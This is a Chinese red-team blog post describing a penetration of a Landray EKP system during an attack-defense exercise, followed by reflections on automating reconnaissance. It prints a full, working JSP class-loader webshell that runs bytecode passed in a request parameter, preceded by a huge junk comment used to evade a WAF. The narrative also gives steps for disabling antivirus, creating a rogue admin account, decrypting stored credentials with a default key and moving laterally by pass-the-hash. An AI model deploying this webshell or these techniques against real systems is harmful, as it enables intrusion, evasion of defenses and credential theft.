文章总结: 本文记录攻防演练实战,通过WAF绕过上传Webshell控制蓝凌EKP,利用APIHammering规避360,读取配置解密凭证进行内网横向移动。作者反思传统攻防流程繁琐,主张开发轻量化工具实现信息收集自动化与资产关联程序化,从而提升效率并解放人力。 综合评分: 87 文章分类: 渗透测试,红队,内网渗透,实战经验
记一次攻防演练后的深思
原创
k1fuhu
CyberGua7d
2025年12月30日 16:38 安徽
最近事情集中到一起,又正好赶上复习周,顺手上了一辆攻防车。过程挺有意思,简单记录一下。
信息收集部分不展开细说。
在子域名收集过程中,发现目标存在 蓝凌 ekp 系统,作为后续重点关注对象。
目标前台存在任意文件上传点,但部署了 WAF,常规 payload 不太好直接使用。通过构造脏数据混淆的方式成功绕过检测,使用工具自带的原生脚本可正常落地。(poc不方便贴出
<!--123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123--!><%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } }
public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } }%><% String cls = request.getParameter("passwd"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); }%>
成功获得 Web 访问能力后,为了后续操作稳定性,又切换为更顺手的管理方式(主要是交互和功能更完善)。
上线c2 机器内有360 使用api hammering的方式绕过 想了解的师傅可以百度下 挺好玩的
截图发现还有托盘有todesk、用远程插件手动点开
手动退出360、然后过了一会没操作 系统锁了让我输入administrator密码、本想提取hash 然后代理 rdp上去发现没权限procdump64直接卡住 没招只能想办法新建用户加入管理员组了
想看下系统用户、还有执行一些ipconfig等发现都不行
于是用复制net1.exe 的方式来新建
rdp上去安装一个xrk 远程过去继续推进
再次上线后,发现系统中还存在其他防护组件,手动关闭。但考虑到目标机器浏览器中存在安全设备后台的登录痕迹,判断该内网环境较为敏感,未贸然进行扫描操作。
然后只能去翻蓝凌ekp的密码 路径如下:
/WEB-INF/KmssConfig/admin.properties、 默认keykmssAdminKey
然后根据ekp的密码去pth内网
winrm依次上线 抓到一台运维机 忘记截图机器数量了、
同时安全设备的密码也是敷用凭证 不贴图了~
最近心里有一个很强烈想法 打了那么多年的攻防,发现暴露出一个很明显的问题:当前很多传统攻防流程,本身就被“人为复杂化”了。
在实际对抗中,像信息收集这一阶段,往往要反复穿插大量零散、重复、低价值但又不得不做的工作,
例如:根据备案信息反查主体、子公司、关联单位、进一步枚举对应的 Web、App、小程序等资产
再对资产归属、真实使用情况进行人工校验这些步骤并不难,但极度消耗时间和注意力,而且很依赖经验积累与手工判断,一旦目标规模变大,效率会明显下降。
从次次攻防来看,真正决定推进速度的,并不是技巧有多“花”,而是谁能更快完成这些基础但繁琐的前置工作。
因此,后续也会考虑围绕这一类问题,针对信息收集与资产关联这一阶段,开发一些轻量级的小工具,把:
可结构化的信息自动化、可规则化的判断程序化、可复用的经验工具化
尽量把精力从“机械劳动”中解放出来,更多投入到真正需要人来思考的地方。
工具不一定要复杂,但要解决实际问题。这或许才是攻防过程中,性价比最高的一次“优化”。
同时有想法的师傅可以后台私信我交流思路 互联世界 交换梦想!
免责声明
本文内容仅用于网络安全技术研究、学习交流与防御思路探讨,所有场景均基于合法授权的测试环境或已脱敏处理的案例进行描述。
文中涉及的技术原理、思路与流程,不针对任何具体单位、系统或个人,亦不构成对现实环境的攻击指导。请读者在遵守国家法律法规及相关行业规范的前提下,合理、合规地使用相关知识。
任何个人或组织因不当使用本文内容而产生的直接或间接后果,均与作者无关。
特此声明。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:CyberGua7d k1fuhu《记一次攻防演练后的深思》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论